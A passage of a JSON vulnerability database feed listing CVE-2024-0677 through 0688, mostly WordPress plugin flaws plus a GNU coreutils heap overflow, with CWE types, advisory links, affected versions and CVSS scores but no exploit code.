"cpe:2.3:h:lamassu:douro:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] }, { "operator" : "AND", "children" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:o:lamassu:douro_ii_firmware:7.1:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] }, { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : false, "cpe23Uri" : "cpe:2.3:h:lamassu:douro_ii:-:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ], "cpe_match" : [ ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.1, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 1.8, "impactScore" : 5.2 } }, "publishedDate" : "2024-01-30T13:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0677", "ASSIGNER" : "contact@wpscan.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-918" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wpscan.com/vulnerability/0f7757c9-69fa-49db-90b0-40f0ff29bee7/", "name" : "https://wpscan.com/vulnerability/0f7757c9-69fa-49db-90b0-40f0ff29bee7/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] }, { "url" : "https://wpscan.com/vulnerability/0f7757c9-69fa-49db-90b0-40f0ff29bee7/", "name" : "https://wpscan.com/vulnerability/0f7757c9-69fa-49db-90b0-40f0ff29bee7/", "refsource" : "", "tags" : [ "Exploit", "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Pz-LinkCard WordPress plugin through 2.5.1 does not prevent users from pinging arbitrary hosts via some of its shortcodes, which could allow high privilege users such as contributors to perform SSRF attacks." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:popozure:pz-linkcard:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.5.3", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-28T05:15Z", "lastModifiedDate" : "2025-04-01T18:28Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0678", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221", "name" : "https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221", "name" : "https://plugins.trac.wordpress.org/browser/order-delivery-date/trunk/order_delivery_date.php#L221", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/71fb90b6-a484-4a70-a9dc-795cbf2e275e?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Order Delivery Date for WP e-Commerce plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'available-days-tf' parameter in all versions up to, and including, 1.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:tychesoftwares:order_delivery_date_for_wp_e-commerce:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "1.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "REQUIRED", "scope" : "CHANGED", "confidentialityImpact" : "LOW", "integrityImpact" : "LOW", "availabilityImpact" : "NONE", "baseScore" : 6.1, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 2.7 } }, "publishedDate" : "2024-02-05T22:16Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0679", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237", "name" : "https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237", "name" : "https://themes.trac.wordpress.org/browser/colormag/3.1.2/functions.php#L237", "refsource" : "", "tags" : [ "Issue Tracking" ] }, { "url" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail=", "name" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail=", "name" : "https://themes.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=214568%40colormag&new=214568%40colormag&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/e982d457-29db-468f-88c3-5afe04002dcf?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The ColorMag theme for WordPress is vulnerable to unauthorized access due to a missing capability check on the plugin_action_callback() function in all versions up to, and including, 3.1.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to install and activate arbitrary plugins." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:themegrill:colormag:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.1.2", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 6.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 2.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-01-20T06:15Z", "lastModifiedDate" : "2025-05-30T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0680", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/wp-private-content-plus/", "name" : "https://wordpress.org/plugins/wp-private-content-plus/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/plugins/wp-private-content-plus/", "name" : "https://wordpress.org/plugins/wp-private-content-plus/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/43d8904f-3bc9-4c67-b44b-8d78762b6b30?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The WP Private Content Plus plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 3.6. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:wpexpertdeveloper:wp_private_content_plus:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.6.1", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-02-07T01:27Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0681", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034414%40page-and-post-restriction&new=3034414%40page-and-post-restriction&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/a3e33a5c-df7c-4ef5-a59c-1c31abcda6d1?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Page Restriction WordPress (WP) – Protect WP Pages/Post plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.3.4. This is due to the plugin not properly restricting access to pages via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected pages. The vendor has decided that they will not implement REST API protection on posts and pages and the restrictions will only apply to the front-end of the site. The vendors solution was to add notices throughout the dashboard and recommends installing the WordPress REST API Authentication plugin for REST API coverage." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:miniorange:page_restriction:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "1.3.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:33Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0682", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://wordpress.org/plugins/pagerestrict/", "name" : "https://wordpress.org/plugins/pagerestrict/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://wordpress.org/plugins/pagerestrict/", "name" : "https://wordpress.org/plugins/pagerestrict/", "refsource" : "", "tags" : [ "Product" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/63f98fd6-eee8-4281-98ea-a267d0442c85?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Page Restrict plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 2.5.5. This is due to the plugin not properly restricting access to posts via the REST API when a page has been made private. This makes it possible for unauthenticated attackers to view protected posts." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:theandystratton:pagerestrict:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "2.5.5", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-02-28T09:15Z", "lastModifiedDate" : "2025-02-07T01:26Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0683", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-862" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3034198%40bulgarisation-for-woocommerce&new=3034198%40bulgarisation-for-woocommerce&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/be759c83-a9df-4858-a724-28006a595404?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Bulgarisation for WooCommerce plugin for WordPress is vulnerable to unauthorized access due to missing capability checks on several functions in all versions up to, and including, 3.0.14. This makes it possible for unauthenticated and authenticated attackers, with subscriber-level access and above, to generate and delete labels." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:autopolis:bulgarisation_for_woocommerce:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "3.0.15", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "HIGH", "availabilityImpact" : "NONE", "baseScore" : 7.5, "baseSeverity" : "HIGH" }, "exploitabilityScore" : 3.9, "impactScore" : 3.6 } }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-02-13T20:14Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0684", "ASSIGNER" : "patrick@puiterwijk.org" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-787" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://access.redhat.com/security/cve/CVE-2024-0684", "name" : "https://access.redhat.com/security/cve/CVE-2024-0684", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://access.redhat.com/security/cve/CVE-2024-0684", "name" : "https://access.redhat.com/security/cve/CVE-2024-0684", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258948", "name" : "RHBZ#2258948", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://bugzilla.redhat.com/show_bug.cgi?id=2258948", "name" : "RHBZ#2258948", "refsource" : "", "tags" : [ "Issue Tracking", "Patch" ] }, { "url" : "https://security.netapp.com/advisory/ntap-20240808-0001/", "name" : "https://security.netapp.com/advisory/ntap-20240808-0001/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.openwall.com/lists/oss-security/2024/01/18/2", "name" : "https://www.openwall.com/lists/oss-security/2024/01/18/2", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] }, { "url" : "https://www.openwall.com/lists/oss-security/2024/01/18/2", "name" : "https://www.openwall.com/lists/oss-security/2024/01/18/2", "refsource" : "", "tags" : [ "Mailing List", "Patch" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "A flaw was found in the GNU coreutils \"split\" program. A heap overflow with user-controlled data of multiple hundred bytes in length could occur in the line_bytes_split() function, potentially leading to an application crash and denial of service." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gnu:coreutils:9.2:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gnu:coreutils:9.3:*:*:*:*:*:*:*", "cpe_name" : [ ] }, { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:gnu:coreutils:9.4:*:*:*:*:*:*:*", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "attackVector" : "LOCAL", "attackComplexity" : "LOW", "privilegesRequired" : "LOW", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "NONE", "integrityImpact" : "NONE", "availabilityImpact" : "HIGH", "baseScore" : 5.5, "baseSeverity" : "MEDIUM" }, "exploitabilityScore" : 1.8, "impactScore" : 3.6 } }, "publishedDate" : "2024-02-06T09:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0685", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-89" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php", "name" : "https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php", "name" : "https://plugins.trac.wordpress.org/changeset/3028929/ninja-forms/trunk/includes/Admin/UserDataRequests.php", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://sec.stealthcopter.com/ninja-contact-forms/", "name" : "https://sec.stealthcopter.com/ninja-contact-forms/", "refsource" : "", "tags" : [ ] }, { "url" : "https://sec.stealthcopter.com/ninja-contact-forms/", "name" : "https://sec.stealthcopter.com/ninja-contact-forms/", "refsource" : "", "tags" : [ ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/3cb73d5d-ca4a-4103-866d-f7bb369a8ce4?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Ninja Forms Contact Form – The Drag and Drop Form Builder for WordPress plugin for WordPress is vulnerable to Second Order SQL Injection via the email address value submitted through forms in all versions up to, and including, 3.7.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to inject SQL in their email address that will append additional into the already existing query when an administrator triggers a personal data export." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:ninjaforms:ninja_forms:*:*:*:*:*:wordpress:*:*", "versionEndIncluding" : "3.7.1", "cpe_name" : [ ] } ] } ] }, "impact" : { "baseMetricV3" : { "cvssV3" : { "version" : "3.1", "vectorString" : "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "attackVector" : "NETWORK", "attackComplexity" : "LOW", "privilegesRequired" : "NONE", "userInteraction" : "NONE", "scope" : "UNCHANGED", "confidentialityImpact" : "HIGH", "integrityImpact" : "HIGH", "availabilityImpact" : "HIGH", "baseScore" : 9.8, "baseSeverity" : "CRITICAL" }, "exploitabilityScore" : 3.9, "impactScore" : 5.9 } }, "publishedDate" : "2024-02-02T05:15Z", "lastModifiedDate" : "2024-11-21T08:47Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0686", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ ] } ] }, "references" : { "reference_data" : [ ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "Rejected reason: Incorrect assignment" } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ ] }, "impact" : { }, "publishedDate" : "2024-03-04T15:15Z", "lastModifiedDate" : "2024-03-04T15:15Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0687", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "NVD-CWE-noinfo" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3037773%40restrict-user-access%2Ftrunk&old=3010745%40restrict-user-access%2Ftrunk&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f67684cd-3e0f-48bb-967a-16ea2b027843?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The Restrict User Access – Ultimate Membership & Content Protection plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.5 via API. This makes it possible for unauthenticated attackers to obtain the contents of posts and pages via API." } ] } }, "configurations" : { "CVE_data_version" : "4.0", "nodes" : [ { "operator" : "OR", "children" : [ ], "cpe_match" : [ { "vulnerable" : true, "cpe23Uri" : "cpe:2.3:a:dev.institute:restrict_user_access:*:*:*:*:*:wordpress:*:*", "versionEndExcluding" : "2.6", "cpe_name" : [ ] } ] } ] }, "impact" : { }, "publishedDate" : "2024-03-13T16:15Z", "lastModifiedDate" : "2025-03-11T13:32Z" }, { "cve" : { "data_type" : "CVE", "data_format" : "MITRE", "data_version" : "4.0", "CVE_data_meta" : { "ID" : "CVE-2024-0688", "ASSIGNER" : "cve-request@wordfence.com" }, "problemtype" : { "problemtype_data" : [ { "description" : [ { "lang" : "en", "value" : "CWE-79" } ] } ] }, "references" : { "reference_data" : [ { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=", "name" : "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3024228%40pubsubhubbub&new=3024228%40pubsubhubbub&sfp_email=&sfph_mail=", "refsource" : "", "tags" : [ "Patch" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] }, { "url" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve", "name" : "https://www.wordfence.com/threat-intel/vulnerabilities/id/f07b166b-3436-4797-a2df-096ff7c27a09?source=cve", "refsource" : "", "tags" : [ "Third Party Advisory" ] } ] }, "description" : { "description_data" : [ { "lang" : "en", "value" : "The \"WebSub 